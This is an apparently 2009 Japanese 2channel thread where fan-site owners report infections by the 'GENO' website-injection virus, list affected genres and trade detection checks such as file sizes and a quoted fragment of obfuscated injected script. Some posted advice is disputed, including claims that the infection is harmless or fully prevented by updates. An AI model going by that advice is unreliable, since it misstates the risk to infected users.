【管理も】同人サイト・GENOウィルス注意2【閲覧も】 at DOUJIN
【管理も】同人サイト・GENOウィルス注意2【閲覧も】 - 暇つぶし2ch617:GENO
09/05/16 17:03:05 Wc8Cd3VC0
>>598
ありがとう見てくる

618:GENO
09/05/16 17:03:29 rdW8H0F70
>>613は忘れておくれ

619:geno
09/05/16 17:03:32 4HsgFFZ10
>>421
同人板ていうか同人サイトの男女比率考えれば当然


620:GENO
09/05/16 17:03:42 QYd4/Tip0
>>597
一応今報告メール出しときました
ジャンル者の方は気を付けて下さい

621:GENO
09/05/16 17:03:42 Gh3ZB53n0
同人サイトなどへの感染例が報告されたジャンル一覧。サーチや情報サイトなど閲覧者多数サイト感染による被害の爆発的拡大が予測される場合、特に()内に記載。

■アニメ系
エヴァ(小説サーチ) / 忍たま乱太郎 / プリキュア / 天体戦士サンレッド / コードギアス / レッツ&ゴー / イナズマイレブン
ガンダム:SEED、00 /

■少年漫画【週刊飛翔系】
リボーン(オンリー+プチオンリー告知サイト・ファンサイト) / テニミュ(ファンサイト) / ジョジョの奇妙な冒険 / ワンピース /
デスノート / D.Gray-man / 遊戯王無印
■少年漫画【Gファンタジーなど少年ガンガン系、小学館、その他】
鋼の錬金術師(オンリー告知サイト) / 隠の王 / 黒執事 / コナン
■青年漫画
ヘタリア (PC鯖使用の携帯向け同盟)/ おお振り(アンソロ告知サイト) / 福本:越境、銀金

■ゲーム【RPG、ACT】
幻想水滸伝 / 戦国BASARA(アンソロ告知サイト) / 戦国無双 / バイオハザード / セブンスドラゴン
メガテン:真、サマナー、ライドウ、P4 / テイルズオブ:ジアビス
■ゲーム【乙女、BL、男性向け】
Vitamin / 遙かなる時空の中で / Starry☆Sky / クインロゼ / 薄桜鬼 / 金色のコルダ
ニトロプラスキラル:咎狗(アンソロ告知サイト)、sweet pool /
Fate / ひぐらし
■ゲーム【アーケード、シューティング、格闘、その他】
ポップンミュージック / ビートマニアⅡDX / 東方 (超大手感染情報) / ブレイブルー /

■小説・ライトノベル - 小野不由美(サーチ)
■創作 - 創作小説 / 男性向け創作同人ゲーム / 女性向け創作同人ゲーム / オリJUNE
■特撮 - 仮○ライ○ー電凹 ※生モノ伏字、凹=王※
■生モノ - ジャニーズ:K○T-TUN、N○WS>>566
■その他の接触確率の高そうな報告例
非同人系ゲーム同盟サイト / 模型イベントホビーコンプレックス告知サイト

このスレで報告されてる以外の新規、ゲームBLニトロプラスキラルに「sweet pool」

622:GENO
09/05/16 17:04:03 ANvAlVha0
自分のメインジャンルで登録しているサーチにURLつきで連絡してみたよ。
なにせメジャータイトル故サイト持ちの年齢層が幅広くておっかないんだ。
自分のサイトにも記事やまとめサイトへの誘導記事載せた。
ネラー認定されても被害が拡大してジャンルが廃れるよりマシだよな。



623:Geno
09/05/16 17:04:06 gTmV5S+lO
>>613
なぜスレを読まない

624:GENO
09/05/16 17:04:27 GfLVqANbO
>>614
まとめ見てこい
IEタブぶちこめば見れる

625:GENO
09/05/16 17:04:33 dUhoo+Zw0
>>610

でもみんな「自分は大丈夫、決まったサイトしか見ないし」って思ってるから
ジャンル名出した方が身近な印象与えられるとは思うんだ

まあ逆に「自分のトコは無いから大丈夫」って思って安心する人が出る可能性もあるけどさ

626:geno
09/05/16 17:04:53 t+UZlBwU0
firefox使ってるんですが、IEとfirefoxでjavaスクリプトのバージョンが違うのを
確認するのにはどうすれば良いのでしょうか?
IEとfirefoxでバージョンが違っていた場合、両方とも新しくするにはどうすれば
良いのでしょうか?
firefoxでjavaの最新版ダウンロード→インストールはしてあります。
IEでも同じ様にjavaスクリプトの最新版をダウンロードしないといけないのでしょうか?

627:geno
09/05/16 17:04:53 sfcpFjSkO
>>610
ジャンル名あったほうが自分に近く感じて
危機感もちょっとは持つんじゃないの
これだけ広がってるって目安にもなるし

628:GENO
09/05/16 17:05:13 U9B3yCv70
>>615
伏せ字が必要かどうかは別としてお前もいい加減痛い。
あと通報しときました。

629:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:05:48 3fZWJBYR0
質問です
XP使用でウィルスバスター2009を使用中
さっき定義手動更新して全体スキャンではなにも出ません

1のsqlsodbc.chm容量確認しようとすると
「ドライブCのボリュームラベルがありません
C:\WINDOWS\system32のディレクトリ
ファイルが見つかりません」と出ます
実際sqlsodbc.chmはあり、プロパティを確認すると
サイズ49.5KB(50,727バイト)
ディスク上のサイズ52KB(53,248バイト)
更新日時2004年8月5日
になってました

アウトなんでしょうか?


630:GENO
09/05/16 17:07:15 RwVE/EfH0
>>613
だからプロパティ見てくれと579がなんども言われてるから

631:2
09/05/16 17:07:55 n/uQJHr/0
>>2の者です

まとめに載せるジャンル名の伏字について
色々考えたんですが、ここに載せることでジャンルが被る被害があるとすれば
【同人サイトがあるようだ、という推測の根拠となる】くらいではないかと思います
しかしそれは2ちゃんのスレやコミケのジャンルコードなどでも同じことですので、
基本【伏字は解除】して掲載します
自分が知らないジャンルはそのまま転載するので、適宜指摘してください
今後、この件について何かあればWikiから直接自分へ連絡をお願いします

632:Geno
09/05/16 17:08:15 gTmV5S+lO
アウトか否かの判断を委ねる人多いけど
わからないなら再起動してみればいいのではないのか?

633:GENO
09/05/16 17:09:00 jTfkUc7xP
ソースのそのまま貼っちゃってごめんね
感染サイトはこんな感じになってるよ
URLリンク(www.dotup.org)

634:GENO
09/05/16 17:09:01 iv1sZAO40
PS3とかPSPはネサフしても大丈夫なんですか?

635:geno
09/05/16 17:09:05 fsWEj42p0
>>629
スレ内もしくはまとめwikiに答えがあります

636:GENO
09/05/16 17:09:09 6bR02nkA0
>>629
再起動すればいいんじゃない

637:GENO
09/05/16 17:09:30 sAiJqBv30
>>629
【cmd.exe、regedit.exeが立ち上がるかどうか】
も確認せよ

638:GENO
09/05/16 17:09:34 BfrfM/sk0
今北産業の人へドゾー

同人サイト向け・通称「GENOウイルス」対策まとめ
URLリンク(www31.atwiki.jp)

セキュ板本スレ
GENOウイルススレ ★5(実質6)
スレリンク(sec板)

639:GENO
09/05/16 17:10:37 U/iBpvAZ0
>>625
後者の方が多い気がするよ…
つーかマイミクがそうだよorz

あと聞きたいんだが感染してないPCの電源落としてても感染すんの?
615の沸騰ぶりにちょっと疑問に思ってる。

640:GENO
09/05/16 17:10:55 02OBQUod0
ブログの感染って報告されてるか?

641:GENO
09/05/16 17:11:14 MhuJZGR90
とりあえずもうジャンルはいいんじゃないか
ここまで広がっちゃってるんだし

漫画から多ジャンルのアニメ、ゲーム、果てはナマモノのジャンルまで感染が広がっています
他人事と思わず小さいジャンルであろうと、どのジャンルでも注意してください
とかでさ

642:G
09/05/16 17:11:17 ZLwS0etV0
>>545
現状亜種というより以前の物と替わってきているので・・・OSはなに?

643:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:11:22 A9qSW+uH0
>>639


644:GENO
09/05/16 17:11:53 fK6yapaL0
まとめに書いてあることまんま聞いてくる人がザクザク増えてきた…

645:GENO
09/05/16 17:12:42 fROCRAiV0
>>631
乙です

646:GENO
09/05/16 17:12:43 zlsW0HIw0
>>626
確認するのはJSのヴァージョンじゃない
AdobeFlashとReaderのヴァージョン
JSの遮断はNoScriptというアドオンを入れるか、
ツール→オプションでJavaScriptを有効にするのチェックを外すかする
それとabout:congigで設定変更
このスレをaboutで検索してその設定に従ってくれ

647:GENO
09/05/16 17:13:03 cN6MMg830
>>641
個人サイトはともかく、サーチやアンソロ告知サイトは
ジャンル込みで載せておくべきだと思う。

648:GENO
09/05/16 17:13:43 NddsKjpSO
>>633
電話のデータフォルダーに保存して、見ようと思ったらjpgになってなかった
よくわからん拡張子だから棄てたんだが何これ

649:GENO
09/05/16 17:13:50 DPZkMYON0
>>640
FC2での感染が報告されてたはず。

650:G
09/05/16 17:13:55 ZLwS0etV0
>>644
それは前スレとかでも言われてたことだし、
下手にリンクをクリックできない
って思っているんじゃないかな?

651:GENO
09/05/16 17:14:44 lapl18Rv0
>633
うわ、これはソース見たら一発で分かるね

>640
報告はあるにはあったけど少数(というかfc2の1件だけ?)
細く情報もなく信憑性は微妙

652:629
09/05/16 17:14:50 3fZWJBYR0
再起動は問題なかったのですが検索サイト運営しているので
万が一にも感染していたら怖いなと思ってます
現在自分のサイトに怪しいジャバスクリプトはありません

>>637
立ち上がります

653:GENO
09/05/16 17:15:08 6bR02nkA0
>>640
ブログも危ない

654:GENO
09/05/16 17:15:14 fksVrn0p0
>>621
伏せたりしないんだったら週刊少年飛翔系も
週刊少年ジャンプ系にした方が良くないか?

あとヘタリアは同盟サイト以外に
普通の女性向けサイトも感染してた

655:GENO
09/05/16 17:15:16 ltuX6AYO0
【牧場経営】牧場物語同人 五年目【恋愛】
スレリンク(doujin板)

269 名前:牧場[sage] 投稿日:2009/05/16(土) 11:06:16 ID:EdZMGbM1O
うちアバスト使いだから感知できたんだけど、よろずメインで少し牧場もやってるサイトが
どうやら感染してるっぽい
(GENOかははっきりとはわからないがまとめサイトみた感じだと
該当ジャンル幸使ってるっぽいし感染の可能性が高い)
一応連絡はしたんだけど他に被害がでてないか心配
サブジャンルだからか幸に登録してないとこだからよかったけど、
今別ジャンルの幸も結構感染してるらしいな
管理人さんも閲も気をつけてね

270 名前:牧場[sage] 投稿日:2009/05/16(土) 13:22:24 ID:yIH9S1az0
それ、GENOスレに報告した方がいいかも知れない

271 名前:牧場[sage] 投稿日:2009/05/16(土) 15:19:04 ID:EdZMGbM1O
というかそのスレですでに報告があったジャンルがメインなとこだからなー
とりあえず行ってくる


656:デジ
09/05/16 17:16:05 NoC9xktr0
スレ見てチェックして見たが問題無かった。

だいぶ前に同人サークルサイト幾つか見てたら、いつの間にか
スパイウエアに感染していた事があって、それ以来見なくなっていたのが幸いしたか。

657:GENO
09/05/16 17:17:21 7q1bHyUp0
まとめサイトに書いてあることについてはまとめ読めでいいんじゃない?

658:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:17:56 9TCJkftg0
まとめサイトは感染してないよね?

659:GENO
09/05/16 17:18:07 ERydDJZg0
あ、ブログも危ないのか。
サイトもPCも感染してなかったのだが、ブログも危ないのなら
ブログへのリンクは切っておいたほうが無難か?

660:GENO
09/05/16 17:18:12 ouvbuwBb0
>295でカスペルスキー2009がAdobe Acrobat Reader自体を脆弱性対象認定
当方カスペ7だけど同様に脆弱性ありとして隔離された

クリーンインストする人はしばらくAcrobatのインストールを控えて。

661:げの
09/05/16 17:18:30 beMfHRDVO
ジャンル名は必要だと思う
PCに疎い層は具体的で差し迫る危険がないと動かない
自分と自分の見てるジャンルがないから安心なんて層、
この勢いじゃすぐ消えるだろ

662:GENO
09/05/16 17:18:37 VYAnahaqP
セキュリティ板のGENOスレに、初心者さんは質問にいかないように・・・
同人スレから流れた感染者があっちのスレで質問しまくって
住人に嫌がられはじめたので

663:GENO
09/05/16 17:18:45 skrVh21r0
>>652
検索サイトやってるからというのは免罪符にならない
少なくともこのスレ読めば感染したかどうかわかるんだから聞く前に読もうよ

664:GENO
09/05/16 17:18:47 vbTPAchq0
>>621
テニミュって生の方に入れた方がよくないか?

665:GENO
09/05/16 17:18:52 oQ1szY8z0
>>388でも同じこと書いてるけど、もう一回。
ウィルスの感染確認するのに、もうcmd.exe、regedit.exeの立ち上がりの有無は
判定方法にならないみたいだから、まとめサイトと次スレテンプレを
書き換えませんか?

666:GENO
09/05/16 17:18:54 pFmk+oGT0
>>658
ここまで来ると呆れて何も言えない

667:GENO
09/05/16 17:19:27 sCtorif20
>>642
XPです

668:GENO
09/05/16 17:20:16 TrcSX6JmO
>>662
こっちでも初心者免罪符にしてまとめ読まないアホが多発してるがな…

669:GENO
09/05/16 17:20:31 gYwor6P50
>>652
だからそんなこわいなら幸全部消して404にして回線物理的に切っとけよ
こわいこわい言いながら幸運営してネットしてるお前が一番怖い

670:GENO
09/05/16 17:20:46 pFmk+oGT0
>>667
アウト

671:GENO
09/05/16 17:20:58 ZjGJKiW50
>>633
ブラクラチェッカーだから今回のウィルスは関係ないとはいえ「安全度100%」が皮肉だな…w

672:GENO
09/05/16 17:21:12 UiMFkn+s0
>>662
元々、万年素人とか無知ゆとりの類が行っちゃいけない板なのに何も考えず誘導しまくるからだな

673:GENO
09/05/16 17:21:29 uACsvbNb0
まとめWiki、FAQの名称を「よくある質問」や
「質問する前に」などに変更するのはどうだろう
ここまで読まない奴だらけだと無駄かもしれないが

674:GENO
09/05/16 17:21:57 xF88a00E0
>>652
ウイルスの症状ないのに「アウトですか?」って訊くと
同じように問題ない人まで疑心暗鬼にさせるからやめれ。
検索サイト持ちだからっていうのは理由にならん。

675:GENO
09/05/16 17:22:03 rdW8H0F70
>>644
まとめでも罠リンク貼られた云々って言われて碌にリンク踏めないんよ

676:GENO
09/05/16 17:23:45 cN6MMg830
よくある質問

・sqlsodbc.chmが見つからない!
 Windowsのバージョンによってある場所が違います。
 ・XP C:\WINDOWS\system32
 ・Vista  C:\Windows\Help\mui\0409 か C:\Windows\Help\mui\0411
 ・98 C:\WINDOWS\system
 スタート→検索でsqlsodbc.chmを探すのが一番手っ取り早いと思われます
 またファイルの日付が2009年3月21日のものは感染している模様です

・sqlsodbc.chmのファイルサイズが49.5kbしかない!
 sqlsodbc.chmを右クリック→プロパティで確認
 50,727 bytesなら正常です



677:GENO
09/05/16 17:23:45 pFmk+oGT0
>>675
じゃもう回線切れば

ネットしないのが一番確実な回避法なんだから
今のところその他の「絶対安心」なんて対策はない

678:GENO
09/05/16 17:23:57 z/7hYsa00
以前XPマシンでカスペがトロイ警告出したサイト
このスレ見てもしやとvista機でチェックしてみたら<BODY>タグの前に

(function(){var RE90jvar~20a~3d~22~
(実際は半角でもっと長い)

みたいなJavaScriptコードがあるんだけど、これってアウト?


679:GENO
09/05/16 17:24:02 skrVh21r0
>>675
なんでそこだけは読んで後に編集する人限定したから大丈夫な流れ読まないんだ

680:GENO
09/05/16 17:24:31 JLSn9lA+0
>>675
今はもう立ち上げ人以外は更新できないようになってるから、罠リンクに関しては大丈夫

681:GENO
09/05/16 17:24:38 r/NKCaP60
>>675
このスレ読んでるなら少なくともここのまとめはもうそんな事ないのわかりきってるだろ
それすら信用できないなら情報収集なんてしようと思わないで落ちればいいんだよ

682:geno
09/05/16 17:24:48 +wdKdS+H0
>>664
まとめサイトには書いてあるけどもうテニミュだけじゃなくて
普通のファンサイト、同人サイトも感染してるらしい

683:GENO
09/05/16 17:24:48 1Jd1LSOl0
放置してヤバイことになるより、一時の恥を選んでお尋ねします
VistaのUACって、デフォルトの設定ですか?
デフォルトならいいんだけど、自分で設定する必要があるならどこから行うのかご教授願いたい

684:GENO
09/05/16 17:25:29 uxBht6KT0
>>545
自分のところもファイルサイズが同じ
HDDクリーンアップのときに圧縮したみたいなんだけど、それでファイルサイズって変わる?

一応、再インスコの準備はしてるけど、それが気になる

685:GENO
09/05/16 17:25:43 428P6x+x0
>>678
それだけの情報じゃわかりません

閲覧者を不必要に不安にさせるようなことはうかつに書き込まないように

686:GENO
09/05/16 17:25:45 ZLlUDLbH0
>>678
アウツ

>>683
デフォ

687:GENO
09/05/16 17:26:24 HMcvEjSE0
>>683
このスレ100回読みなおせクズ

688:GENO
09/05/16 17:26:46 428P6x+x0
>>683
そこまでくると流石にスレ違い
firefoxでjavaスクリプト切って自分でググれ

689:GENO
09/05/16 17:27:10 smog3tIQ0
>>668
でもあっちで初心者丸出し質問されるよりこっちで対処した方がマシだわ

690:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:27:16 ML/xDnST0
まとめwiki見るのが怖いなら、
最低限このスレの >>1-10 読め。

Adobe関係の最新バージョンと確認方法は >>274

691:GENO
09/05/16 17:27:35 OPjvi40EO
>>688
今はググらせちゃ駄目だろ

692:GENO
09/05/16 17:27:46 428P6x+x0
なんで自分で調べようと思わないんだろう…

693:GENO
09/05/16 17:28:12 RwVE/EfH0
>>682
いやだから、テニミュはナマモノ扱い、テニプリは漫画扱いではないかということ
なんじゃなかろうか。

694:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:28:27 NG0XsJSj0
FlashもReaderもどっちも消せばどうということはない

695:GENO
09/05/16 17:28:44 lFaYB71c0
>>692
ここで聞く=自分で調べてると思ってんだろ

696:GENO
09/05/16 17:29:06 skrVh21r0
>>693
> >>682
> いやだから、テニミュはナマモノ扱い、テニプリは漫画扱いではないかということ

それでいいと思うけどな
ミケでもコード違うんだからジャンルが違うと思っても間違いないし

697:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:30:16 JsLvVHuyP
騒ぎすぎ
Cドライブ全削除するわけでもなく実害は無いに等しい
気にしなければ問題なし
スパイウェアみたいなもん

698:GENO
09/05/16 17:30:31 ZefNRz2i0
知人にGENOウイルスの話したら サイト持ってないから関係ないしwwwwって言われた……
まさに>>452の典型 こういう人にはどう言ったらいいのだろうか

普通のサイトにも感染してるよって言っても製薬会社のサイトなんか見ないしwwwみたいな反応

699:GENO
09/05/16 17:30:45 HMcvEjSE0
まとめ読むのも惜しいなら少しでも不安になったらクリーンインスコ、サイト削除、パス変更全部やっとけよ
その後ネサフは一切せずに電源落としてケーブルとかはひっこぬく
そうすりゃその間は確実に安心だ

700:geno
09/05/16 17:30:51 X4jSMVfI0
>>200のサイト反応してくれないんだけど、結構時間かかるのかな…

701:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:31:26 NG0XsJSj0
これってgenoウイルス以外のういるすさんもダウソしてゾンビPCにするんでしょ
ほわいたーさんとか入れられたら終わるくね

702:GENO
09/05/16 17:31:37 uy8wj/XV0
もうセキュ板のURL貼るの止めた方がいいんじゃない?
こっちで初心者ちゃんが暴れるのはともかく、セキュ板の方はまずいよ
まとめスレ>>2があるんだし

>>697
釣りじゃないならマジモンの基地害としか言えない

703:678
09/05/16 17:31:42 z/7hYsa00
>686
ありがと、本人に注意喚起のお知らせして、
自サイトでも警告してこよう

ちなみにD.Gray-man、銀魂同人サイトです


704:GENO
09/05/16 17:31:53 BpSFSHPIO
>>698
そういう奴ほどGENOウイルスに感染してたりするんだよね

705:geno
09/05/16 17:32:11 5qGyw+II0
>>697
クマー

706:geno
09/05/16 17:32:25 fsWEj42p0
>>698
「草生やしてる間にも個人情報だだ漏れかもね」とでも言ってやれ

ムダだろうけど

707:GENO
09/05/16 17:32:35 VYAnahaqP
>>697
>>4を読んだ上でそれいってるなら楽観的過ぎる


708:GENO
09/05/16 17:33:06 jWuewssEO
MEはどうしたらいいんだ…

709:G
09/05/16 17:33:11 ZLwS0etV0
>>667
ちょっと試して欲しい事
タスクマネージャを起動してネットワーク使用状況をグラフで見れるようにしておく
また以下をする前のプロセスを覚えておいて欲しい

コマンドプロンプトはあがるみたいだから、
そこからftpと入力
 ftp>
と出ると思うから、1分待って
この間にネットワーク状況やプロセス見ておいて欲しい
open www.example.com
と入力
そのときのネットワーク状況やプロセスがどうなるか知りたい


710:geno
09/05/16 17:33:24 E7LcELUR0
ニフティ感染?

711:geno
09/05/16 17:33:46 bmeWatfA0
>>698
今回のことに限らずだけど、クレカのパス盗まれて、変な請求キター!
とか、自分に実害が及ばないと普通の人の反応なんてそんなものだよな…
パソコンに詳しくないくせに危機感ゼロ。

712:GENO
09/05/16 17:34:08 Twq95x0L0
> ウイルス定義データベースをアップデートするまでお待ちください
> 製品 @niftyウイルスチェックサービス のライセンスを確認中に不明のエラーが検出されました。

って出たけどこれアウトだからの結果?


713:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:34:29 ztB8Zhmo0
>>698
・ウイルスに感染悪化→ある日パソを起動すると画面が真っ青に
それかクレジットや通販関係のパス抜かれる可能性あるって言っとけ
具体的でわかりやすいのはそのへん

714:GENO
09/05/16 17:34:53 uy8wj/XV0
>>708
窓から投げ捨てろ

715:geno
09/05/16 17:35:16 ztB8Zhmo0
>>713
名前欄忘れた。>>698宛ね

716:GENO
09/05/16 17:36:12 OmZTJmEN0
>>685
この情報だとアウトってくらいわかりそうなもんだが・・・
あとググレカスで誘導するよりwiki見ろって誘導のほうがイーンジャネーノ?

717:GENO
09/05/16 17:36:38 nxtnhayc0
>>702
向こうはこちらをダシにする荒らしだらけになってスレが機能しなくなり始めてる
これ以上誘導し続けるのは駄目だ

718:2
09/05/16 17:36:55 n/uQJHr/0
>>665
「とりあえず感染してるか~」に追記しました

715まで確認、漏れあったら指摘よろしく

719:GENO
09/05/16 17:37:03 lapl18Rv0
>708
ME使ってる時点で既にアウトギリギリだろ
GENOに限らずとっくの昔に何かに感染してる可能性が

720:ウイルス
09/05/16 17:37:20 dncZC0E3O
ニフティのオンラインスキャンでは感染見つからなかったしソースの改ざんも大丈夫だったけど
何故か金曜日からネット立ち上げた後フリーズしたりデスクトップアイコンクリックできなくなって終了時に開いたりする
これはウイルスと関係あるのか

721:geno
09/05/16 17:38:21 t+UZlBwU0
>>646
ありがとう!今確認したら最新バージョンだった。
firefoxにてjavaスクリプト遮断&NOスクリプト入れてます。

722:665
09/05/16 17:38:24 oQ1szY8z0
>718
対応ありがとうございました。
まとめサイト、非常に助かってます。ありがとうございます。

723:GENO
09/05/16 17:38:38 0G5FPF7HO
自分報告
ボカロのカイミクサイト感染しました
仲間内も全員感染してたのでサイト完全に全部削除したけど注意

724:GENO
09/05/16 17:38:39 VYAnahaqP
質問しにくる初心者は、この感染具合からみて
減ることは無さそうなので初心者の質問あたりに
質問専用GENOウイルススレ立てることを提案

725:GENO
09/05/16 17:38:44 RwVE/EfH0
>>720
他のウイルスかもしれないけど
一般的なアンチウイルスソフト入れたり、窓アップデートはしてないの?

726:GENO
09/05/16 17:38:45 2lgCZZxBO
>>696同意

飛翔の項目に、テニスの王子様(同人)

芸能の項目に、テニミュ(同人・ファンサイト)

の方がわかりやすいと思う

727:geno
09/05/16 17:39:08 DfiUFOfq0
FC2ブログが感染って単なる風評?それとも本当?
自分のブログのソースはとりあえず問題なかったけど
感染してる鯖まるごとゾンビ化してるなんて恐ろしいことはないよね?

728:GENO
09/05/16 17:39:28 uy8wj/XV0
この勢いだと夜には次スレが立つだろうから
次からは>>1の関連スレはなくして欲しい
セキュ板のほうは同人知らない人だってたくさん見るんだし
アフォな質問でスレを埋めるのは勘弁

正直、>>1からのテンプレとまとめwikiだけでも充分
もっとも、今のところ絶対大丈夫なんて対策は
ネット切断くらいしかないけど

729:GENO
09/05/16 17:39:39 Kv96HR5gO
>>708
DSP版XP買ってこい

730:GENO
09/05/16 17:40:54 TV+NV+ev0
>>727
グレンスレの妙な報告だけだからまだわかってない

731:GENO
09/05/16 17:41:05 4Ed0MWLw0
XPでもUserAgentを偽装すれば感染しなかったよ
Vistaを狙うウイルスやUserAgentで判別しないウイルスが出てきたらアウトだけど

732:GENO
09/05/16 17:41:24 zlsW0HIw0
>>721
configのスペル間違ってた、スマンw
>>9も忘れずに。
flashとreaderは最新verでも絶対安心ということはないから注意

733:GENO だから報告は名前欄に「報告」入れてくれー!
09/05/16 17:41:39 ujLFTIV80
だから

報告は名前欄に「報告」入れてくれー!

流れも早いんだし、せっかく報告するんだから、
更新する人が見つけ易いように協力してあげようよ


734:¥
09/05/16 17:43:07 mw4bEjk60
>>513
>>532
まとめサイトなんだから当然検索にも引っかかる
ロボット除けしてもこのスレッドが引っかかるから無意味

まとめサイトだから他のスレでもまとめとしてそのアドレスが載せられる

735:geno
09/05/16 17:43:20 DAWCjk8m0
俺のPCはよかったんだが親のが心配だ・・・
マカフィーでウイルス見つかる?

736:GENO
09/05/16 17:43:47 JLSn9lA+0
>>2
>>723の補足
ボーカロイド取扱いサイト(同人)に感染アリ
一応削除済


737:報告
09/05/16 17:43:59 0G5FPF7HO
>>733
すいません
もっかい書きます!
ボカロのカイミクサイト感染してました。
仲間内も全員感染してたんで(幸通して8以上だと思います)サイト全部削除しました


738:GENO
09/05/16 17:45:51 rmKKQtMq0
>>735
>>1

739:GENO
09/05/16 17:46:19 JLSn9lA+0
>>737
じゃあ次はOS再インスコだな。
そんでその後はFTPのID、パス変更
まあ全部終わってんならスルーしてくれ

740:GENO
09/05/16 17:46:23 PitVBKa40
質問
とりあえず現時点では感染していないのでavastを入れてみたんだけど
普通にインストールするだけでおkですか?
何か設定が必要だったら教えてください

741:GENO
09/05/16 17:46:30 lapl18Rv0
>>735
まとめサイト見ろってんですよ

742:geno
09/05/16 17:46:38 Yj4M5Gzw0
>>735
マカフィーみたいなクソソフトが対応してるわけないじゃん

743:GENO
09/05/16 17:47:27 lYCNv42G0
>>740
微妙にスレチ

744:GENO
09/05/16 17:47:47 ZefNRz2i0
>>698です。みんなレスありがとう!>>713を言ってみます。
ビビりすぎって笑われたのは自分がきちんと理解できてなくてうまく説明できなかったのも原因だと思うけど、
サイトやSNSで注意喚起する時に>>698的な認識の人にもちゃんと伝わるようにすることが感染拡大を抑えるために大事な気がする。

745:GENO
09/05/16 17:47:49 BpSFSHPIO
>>735
残念ながら今のところマカフィーは役に立ちません・・・

746:GENO
09/05/16 17:48:08 HMcvEjSE0
>>734
伏せ字どうでもいいけどそこまでは気にしなくていいかと。
つーかこういうのイヤなんだろうけどキリないし、そこは気にしても仕方ないよ。

747:報告補足
09/05/16 17:48:14 0G5FPF7HO
>>739
全部終わりました!わざわざありがとうございます。
自分のサイトはまだしも感染してた友人のサイトが1700くらい登録のある幸で3位だったので
これから大変なことになる気が………

748:geno
09/05/16 17:48:18 rdW8H0F70
>>677
極論に答えは無し

>>679-681
知るかそんなの。聞いてくるやつに聞け。

749:GENO
09/05/16 17:48:21 SyLRqLEN0
>>732
セキュ板のほうでも書いたけど、Firefoxが標準で有効にしている先読み機能そのものに問題はない。
リンクに先読みのヒントが与えられていて、キャッシュされたとしても、
実際にブラウザでそのページを開かないかぎり何も起こらない。

それと、どんなソフトでも完全にセキュアということはないし、いたずらに恐怖をあおるのはどうかと思う。
今回の件はFlash PlayerとAdobe Readerを最新版にしてあれば防げる問題でしょう。

750:GENO
09/05/16 17:48:52 rmKKQtMq0
>>740
avastスレ逝け

751:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:49:19 5AlQPwu90
>>723
仲間内全員感染って凄いな…恐ろしい

752:geno
09/05/16 17:49:28 Twq95x0L0
>>712と同様になってる人居ませんか?

753:GENO
09/05/16 17:49:54 pbsx4U5a0
>>747
GYAAA それだともう幸のトップに注意文でも書いてもらったほうがいいような気もする

754:GENO
09/05/16 17:50:16 /m6gQ1ZiP
インストール出来ないのに対策するってのもなかなかのものだね…

755:GENO
09/05/16 17:50:22 rmKKQtMq0
>ID:rdW8H0F70

馬鹿かこいつは

756:GENO
09/05/16 17:50:36 sHpJx3sa0
>>734
そんなどーでもいい終わった話より建設的な話してくれ

757:GENO
09/05/16 17:51:28 OmZTJmEN0
>>747
洒落にならん事態だな・・・

758:GENO 報告は名前欄に「報告」推奨
09/05/16 17:51:30 ujLFTIV80
Wiki管さん、そろそろジャンルごとの表記のあたりに、
1件どころではない注意を入れてほしいです

例)

※感染報告が1件以上あったジャンルです。順不同。
中には複数から二桁感染のジャンルもあります(感染疑いを含む)
※ここに挙がっていないジャンルも感染が広がっている恐れがあります



759:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:51:44 7BZI/qbJ0
で感染するとどうなるの?
ファイルでもぬかれるの>

760:GENO
09/05/16 17:52:01 L1EhDlX40
>>755
自分がどんなレスしたかも分からない池沼相手にしても無駄

761:GENO
09/05/16 17:52:24 uy8wj/XV0
>>759
>>1

762:報告補足
09/05/16 17:52:25 0G5FPF7HO
>>753
幸の管理人さんもPC感染していたので、
サイト削除済みです。
やばいっすよねやっぱりこれ

763:GENO
09/05/16 17:52:33 A9qSW+uH0
>>749
>今回の件はFlash PlayerとAdobe Readerを最新版にしてあれば防げる問題でしょう。

お前は何を言っているんだ

764:GENO
09/05/16 17:52:50 pbsx4U5a0
>>759
>>1を見上げてごらん

765:GENO
09/05/16 17:53:04 lA4iAsSeO
>>727
FC2ブログはJavaScriptタグが無効にならないから、誰かが感染して埋め込まれると
そのブログのRSSで感染スクリプト一括送信→受信したトコも閲覧した人も皆
アウト!ってー恐ろしい図式が…ってのはどっかで見たけど、感染報告あったの!?

766:GENO
09/05/16 17:53:18 RwVE/EfH0
>>747
幸管理人に頼んで幸トップに告知だしてもらってほしい

ボカロ使える人に頼んで
ウイルス注意って歌って貰うとか無責任なことを思いついたw

767:名前欄にスレ名入力推奨@自治スレ
09/05/16 17:53:29 eQafMeB50
>>740
重くてうざくても常駐保護は全部入れて最高設定に

768:GENO
09/05/16 17:54:27 JLSn9lA+0
>>747
幸通して…ってまさか幸もじゃないよな。
ないなら幸管理人に連絡+注意文のお願い出した方がいい
あと、サイト再建するならウィルスかかってたよごめんね+みんなチェックしてねのお知らせを書くべし

>>748
なんで俺も怒られてんの

769:GENO
09/05/16 17:54:52 uy8wj/XV0
>>749
適当なこと言ってんなよ。
現時点で「~しておけば絶対妨げる」なんてもんはないんだよ。

770:GENO
09/05/16 17:55:04 A9qSW+uH0
FC2ブログのは1回だけ書き込みがあって
詳細もなく曖昧なまま

FC2ブログで何かあったらとっくにレンタル元が
何か声明出してると思うけどな

771:GENO
09/05/16 17:55:11 pbsx4U5a0
>>762
とにかく大事なのは一刻も早くクリインストしてサイトに注意文をあげることではないか
3位ならブクマしてる人も多いだろうから見てくれる人も多いだろうし

772:GENO
09/05/16 17:55:15 wC2VoGPT0
>747
幸管も!?
危ないなあ…告知は出てないのかな

773:GENO
09/05/16 17:55:18 sm/UqJZG0
>>747
日のヒットがどんだけだかわかんないんだけど
3/1700って相当やばくないか?
サーチの名前とか載せちゃまずいのかな
そのくらいしないとやばいと思うんだけど

774:GENO
09/05/16 17:55:31 5AlQPwu90
>>768
>>762

775:GENO
09/05/16 17:55:55 lapl18Rv0
>762
うわあああああああああああああああ

削除済みって、幸削除して跡地は?
告知してないなら即刻した方が良いと思うんだが

